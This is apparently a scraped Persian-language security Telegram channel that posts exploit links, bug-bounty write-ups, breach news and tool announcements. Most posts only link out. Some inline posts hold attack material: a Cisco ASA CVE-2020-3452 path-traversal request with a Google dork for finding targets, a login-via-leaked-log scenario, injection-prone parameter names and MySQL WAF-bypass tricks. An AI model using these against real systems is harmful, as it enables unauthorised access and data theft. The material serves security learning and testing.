امنیت اطلاعات

رایت آپ کشف آسیب پذیری بر روی فیسبوک
این آسیب پذیری به هکرها اجازه میداد هر عکس دلخواهی را حذف کنند

https://bugreader.com/social/write-ups-general-how-we-were-able-to-delete-donald-trump-posts-on-facebook--100955

#facebook
#bugbounty
#pentest
#writeup

@sec_nerd

1.06K views15:25

امنیت اطلاعات

یک هکر ناشناس dataviper را هک کرده وبیش از ۸۲۰۰ دیتابیس این وبسایت را به سرقت برد

دیتاوایپر یک سرویس امنیتی امریکایی ست که دیتابیس های هک شده در اینترنت را مانیتور و جمع آوری میکند و به مشتریان خود اعلام میکند که آیا قربانی حملات سایبری بوده اند یا خیر

این هکر اعلام کرده است که اطلاعات میلیاردها کاربر را که قربانی هک های سالهای گذشته بوده اند در اختیار دارد.
وی اقدام به ارسال آدرس یک وبسایت در دارک نت برای برخی متخصصان امنیت کرده است.

https://www.zdnet.com/article/hacker-breaches-security-firm-in-act-of-revenge/

#news #breach

@sec_nerd

1.47K views15:46

امنیت اطلاعات

#fun
#darknet

@sec_nerd

892 views15:48

امنیت اطلاعات

اکسپلویت کردن یک ایراد امنیتی در ویندوز ۱۰ که منجر به بالا رفتن سطح دسترسی میگردد

https://github.com/Q4n/CVE-2020-1362

#windows #privesc

@sec_nerd

809 views15:56

امنیت اطلاعات

اجرای دستور بر روی گوشی های سامسونگ با نسخه های اندروید خانواده ۸، اندروید۹ و ۱۰ بدون نیاز به دخالت کاربر

اکسپلویت شناسه CVE-2020-8899 کشف شده توسط google project zero

توضیحات فنی
https://googleprojectzero.blogspot.com/2020/07/mms-exploit-part-1-introduction-to-qmage.html

دمو:
https://www.youtube.com/watch?v=ZQnb8kRMkHg

#android
#rce
#samsung

@sec_nerd

795 views16:11

امنیت اطلاعات

یک سناریوی ساده برای حمله به وبسایت

- use https://dirsearch.py -u site -e php,xml,jsp,asp -x 500,403
- got result https://site.com/admin/error.log
- open the log file
- there is juicy info and open https://site.com/admin/index.php
- use the php_auth_user and php_auth_pass
- logged in

#bugbounty
#pentest
#web

@sec_nerd

1.14K views16:13

امنیت اطلاعات

حمله به شبکه ی ویندوزی با ترکیب دو ابزار Responder و Snarf

https://ijustwannared.team/2017/05/20/responder-and-snarf/

#windows
#privesc
#pivoting

@sec_nerd

655 views16:17

امنیت اطلاعات

دستیابی به خط فرمان بر روی ماشین ویندوزی از طریق لینوکس

https://www.infosecmatter.com/rce-on-windows-from-linux-part-1-impacket/

https://www.infosecmatter.com/rce-on-windows-from-linux-part-2-crackmapexec/

https://www.infosecmatter.com/rce-on-windows-from-linux-part-3-pth-toolkit/

https://www.infosecmatter.com/rce-on-windows-from-linux-part-4-keimpx/

https://www.infosecmatter.com/rce-on-windows-from-linux-part-5-metasploit-framework/

https://www.infosecmatter.com/rce-on-windows-from-linux-part-6-redsnarf/

#windows
#privesc
#rce
#pivoting

@sec_nerd

InfosecMatter

RCE on Windows from Linux Part 1: Impacket - InfosecMatter

Impacket command examples on how to perform remote command execution (RCE) on Windows machines from Linux (Kali) using psexec.py, dcomexec.py, smbexec.py, wmiexec.py or atexec.py

735 views16:33

امنیت اطلاعات

مرورگر از پیش تنظیم شده در آپدیت جدید burpsuite قرار گرفت

https://www.youtube.com/watch?v=-s5QCgNlp5A

https://portswigger.net/burp/releases/professional-community-2020-7

#burpsuite

@sec_nerd

YouTube

Launching Burp Suite's preconfigured browser (2020.7 release)

See the latest feature in Burp Suite Pro and Community Edition: the ability to launch Burp's embedded browser, preconfigured to work with Burp Proxy.

Download the latest version of Burp Suite at: https://portswigger.net/burp/releases

Learn more about Burp…

1.3K views16:58

امنیت اطلاعات

اسکن تمام پورتها در ۱۹ ثانیه!

https://github.com/brandonskerritt/RustScan

#network
#recon
#nmap

@sec_nerd

1.63K views17:41

امنیت اطلاعات

ماژول متاسپلویت برای آسیب پذیری SAP Netweaver با شناسه CVE-2020-6287
با قابلیت اضافه کردن یوزر ادمین

https://github.com/rapid7/metasploit-framework/pull/13852

#SAP
#msf

@sec_nerd

GitHub

Module for SAP "RECON" CVE-2020-6287 that adds an admin user by zeroSteiner · Pull Request #13852 · rapid7/metasploit-framework

This is a PR that will add an admin user to vulnerable SAP Netweaver systems (7.30-7.50) by sending a crafted SOAP request to the unauthenticated endpoint CTCWebService/CTCWebServiceBean.
This can ...

1.14K views18:46

امنیت اطلاعات

ابزار اتوماتیک اکسپلویت کننده آسیب پذیریهای ثبت شده در weblogic

https://github.com/0xn0ne/weblogicScanner

#weblogic #rce #exploit

@sec_nerd

GitHub

GitHub - 0xn0ne/weblogicScanner: weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力：CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017…

weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力：CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-32...

1.18K views10:32

امنیت اطلاعات

شرح کامل آسیب پذیری کشف شده در sharepoint با شناسه CVE-2020-1147 به همراه اکسپلویت

https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

#sharepoint
#microsoft
#windows
#rce

@sec_nerd

920 views10:35

امنیت اطلاعات

آسیب پذیری LFI در تجهیزات سیسکو ASA

شناسه:CVE-2020-3452

- Google Dork: inurl:/+CSCOE+/

- Exploit Code
[Victim]/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" -O [Filename]

#cisco
#lfi

@sec_nerd

844 views10:32

امنیت اطلاعات

شاید خندتون بگیره ولی حقیقت داره!

#hack
#fun

@sec_nerd

793 views17:15

امنیت اطلاعات

پارامترهای معمول آسیب پذیر در برابر حملات RCE

cmd
exec
command
execute
ping
query
jump
code
reg
do
func
arg
option
load
process
step
read
function
req
feature
exe
module
payload
run
print

#rce

@sec_nerd

692 views17:37

امنیت اطلاعات

رایت آپ کشف باگ SSRF در grafana.com

https://rhynorater.github.io/CVE-2020-13379-Write-Up

#writeup
#bugbounty
#ssrf

@sec_nerd

rhynorater.github.io

CVE-2020-13379

Unauthenticated Full-Read SSRF in Grafana

1.01K views17:48

امنیت اطلاعات

Mysql waf bypasses to cash on SQL-Injection bugs

1. select '\f\l\a\g'='flag'; // This is true
2. All are same
* select 'abcd';
* select 0x61626364;
* select 0b01100001011000100110001101100100;
3. select 'admin' = 'àdmin'; // is true if utf8 is allowed

#bugbounty
#sqli

@sec_nerd

1.21K views18:02

امنیت اطلاعات

دسترسی به ادمین دامین یک دانشگاه در ایالت فلوریدا به بیش از ۵ هزار کلاینت به مبلغ 1.5 بیت کوین به فروش گذاشته شده است

#breach #news

@sec_nerd

751 views18:13

امنیت اطلاعات

باج افزار Netwalker در عرض ۵ ماه ۲۵ میلیون دلار درآمد داشته است!

این باج افزار سازمانهای بزرگ را هدف قرار میدهد و قادر به تسخیر شبکه داخلی است.

اهداف نت واکر در طی این ۵ ماه شامل:
شرکت Toll Group از استرالیا
دانشگاه ایالت میشیگان
UC san fransicsco
مرکز سلامت Lorien
گروه Dussmann آلمان

https://www.bleepingcomputer.com/news/security/netwalker-ransomware-earned-25-million-in-just-five-months/

#news
#ransom

@sec_nerd

BleepingComputer

Netwalker ransomware earned $25 million in just five months

The Netwalker ransomware operation has generated a total of $25 million in ransom payments since March 1st according to a new report by McAfee.

1K views19:02

امنیت اطلاعات

رایت آپ کشف آسیب پذیری RCE بر روی روتر های مبین نت توسط دو محقق امنیتی که از دوستان کانال و گروه هم هستند

https://medium.com/@maj0rmil4d/seowon-slc-130-router-rce-unlocking-writeup-90854ae2eb0e

#writeup
#rce
#mobinnet

@sec_nerd

780 views14:49

About

Blog

Apps

Platform